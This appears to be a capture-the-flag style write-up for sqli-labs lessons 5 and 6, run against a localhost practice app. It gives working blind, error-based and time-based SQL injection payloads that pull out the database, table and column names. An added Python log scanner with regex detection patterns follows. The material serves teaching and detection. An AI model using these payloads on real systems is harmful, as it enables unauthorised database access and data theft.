LESS-5:
Source code:
1. Requesting http://127.0.0.1/sqlilabs/Less-5/?id=1 produces no error:
2. Requesting http://127.0.0.1/sqlilabs/Less-5/?id=268 shows no display position, so a union query cannot be used.
3. Requesting 127.0.0.1/sqlilabs/Less-5/?id=1'
and analysing the error: the error text contains ''1'' LIMIT 0,1'. Removing the leading and trailing quotes and the one we added ourselves leaves one pair of single quotes, which tells us that this injection point is closed with a single quote.
1. Blind injection:
Using left():
http://127.0.0.1/sqlilabs/Less-5/?id=1' and left(version(),1)=5%20%23
This result means the version guess is correct; when the guess is wrong the output differs. Next, use length() to guess the length of the database name:
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())=8%20%23
Guess the first character of the database name:
http://127.0.0.1/sqlilabs/Less-5/?id=1' and left(database(),1)%3E%22a%22%23--+ (binary search can be used for the guessing)
Guess the second character of the database name,
knowing that the first character is s:
http://127.0.0.1/sqlilabs/Less-5/?id=1' and left(database(),2)%3E%22sa%22%23--+
Using the substr() and ascii() functions (syntax: substr(a,b,c) takes c characters of string a starting at position b; ascii() converts a character to its ASCII value):
The following guesses the first character of the first table name (binary search to find the correct value):
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))%3E80--+
substr(**,2,1) can be used to guess the second character of the same table name.
limit 2,1 can be used to move on to the second table.
2. When the page displays errors, error-based injection can be used:
Recommended reading for understanding this: https://mochazz.github.io/2017/09/23/Double_SQL_Injection/
Input: http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+
http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select%20database()),0x3a,0x3a,floor(rand(0)*2))%20a%20from%20information_schema.columns%20group%20by%20a--+
Only the content after the second select needs to be changed to extract whatever value you want.
Input:
http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema="security" limit 3,1 ),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a --+
URL-encoded:
http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%22security%22%20limit%203,1%20),0x3a,0x3a,floor(rand(0)*2))%20a%20from%20information_schema.columns%20group%20by%20a%20--+
http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema="security" limit 0,1 ),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a --+
(the changed part)
http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select%20column_name%20from%20information_schema.columns%20where%20table_name=%22users%22%20limit%201,1),0x3a,0x3a,floor(rand(0)*2))%20a%20from%20information_schema.columns%20group%20by%20a--+
Another error-based injection (simpler, recommended):
http://127.0.0.1/sqlilabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,0x7e,(select database()),0x7e,0x7e))--+
http://127.0.0.1/sqlilabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,0x7e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x7e,0x7e))--+
Time-based injection:
1. Injecting with the sleep() function
sleep(n) forces a pause of n seconds. There is a precondition for this method: the query only pauses when records matching the specified condition exist. For example, with the condition name='pig', if no such record exists the execution time is 0; if records exist, sleep(n) runs once for each matching row.
http://127.0.0.1/sqlilabs/Less-5/?id=1' and if(ascii(substr(database(),1,1))=115,1,sleep(5))--+
LESS-6
LESS-6 is similar to LESS-5; the only difference is that Less-6 uses double quotes:
Source code:
http://127.0.0.1/sqlilabs/Less-6/?id=1"
which shows that the closure is with double quotes;
1. Blind injection
Using left():
http://127.0.0.1/sqlilabs/Less-6/?id=1" and left(version(),1)=5%23
2. Error-based injection:
http://127.0.0.1/sqlilabs/Less-6/?id=1" and extractvalue(1,concat(0x7E,(select database()),0x7E))--+
3. Time-based injection
http://127.0.0.1/sqlilabs/Less-6/?id=1" and if (ascii(substr(database(),1,1))=115,1,sleep(5))--+
http://127.0.0.1/sqlilabs/Less-6/?id=1" and if (ascii(substr(database(),1,1))=112,1,sleep(5))--+
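From the defender's side, the probes in both LESS-5 and LESS-6 leave recognisable traces in the web server's access log. The following Python script is an added example (not part of the original write-up or of sqli-labs): it URL-decodes each request path and flags the quote-closure pattern (a numeric id followed by ' or " and a SQL connective) together with the three techniques described above. The host, timestamps and log lines are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (placeholder host and timestamps, not from
# the original write-up) mirroring the probe shapes the lessons walk through.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqlilabs/Less-5/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqlilabs/Less-5/?id=1'%20and%20left(version(),1)=5%20%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqlilabs/Less-5/?id=1'%20and%20ascii(substr(database(),1,1))%3E80--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /sqlilabs/Less-5/?id=1'%20and%20extractvalue(1,concat(0x7e,(select%20database()),0x7e))--+ HTTP/1.1" 200 740
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /sqlilabs/Less-6/?id=1%22%20and%20if(ascii(substr(database(),1,1))=115,1,sleep(5))--+ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /sqlilabs/Less-5/?id=268 HTTP/1.1" 200 480
"""

REQ_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')

# One signature per technique in the write-up, matched against the URL-decoded
# path so that %20/%3E/%22 encoding does not hide the keywords.
SIGNATURES = [
    ("time-based", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("error-based", re.compile(r"\b(?:extractvalue|updatexml)\s*\(|floor\s*\(\s*rand\s*\(", re.I)),
    ("boolean-blind", re.compile(r"\b(?:left|substr|substring|ascii|length)\s*\(.*?(?:[<>=]|\blike\b)", re.I | re.S)),
]
# A numeric parameter followed by a quote and then a SQL connective is the
# quote-closure pattern Less-5 (') and Less-6 (") rely on.
QUOTE_BREAK = re.compile(r"""=\d+['"]\s*(?:and|or|union)\b""", re.I)


def classify_request(line):
    """Return (decoded_path, quote_break, techniques) or None if no request is found."""
    m = REQ_RE.search(line)
    if not m:
        return None
    path = unquote_plus(m.group("path"))
    techniques = [name for name, rx in SIGNATURES if rx.search(path)]
    return path, bool(QUOTE_BREAK.search(path)), techniques


def scan_log(text):
    """Return (line_no, path, quote_break, techniques) for every suspicious request."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        result = classify_request(line)
        if result and (result[1] or result[2]):
            findings.append((no, *result))
    return findings


if __name__ == "__main__":
    for no, path, broke, techs in scan_log(SAMPLE_LOG):
        print(f"line {no}: quote-break={broke} techniques={techs} path={path}")
```

Running it on the constructed log flags lines 2 to 5 and leaves the two ordinary requests (id=1 and id=268) alone; in a real deployment the same signatures can be applied to the decoded query string in a WAF or SIEM rule.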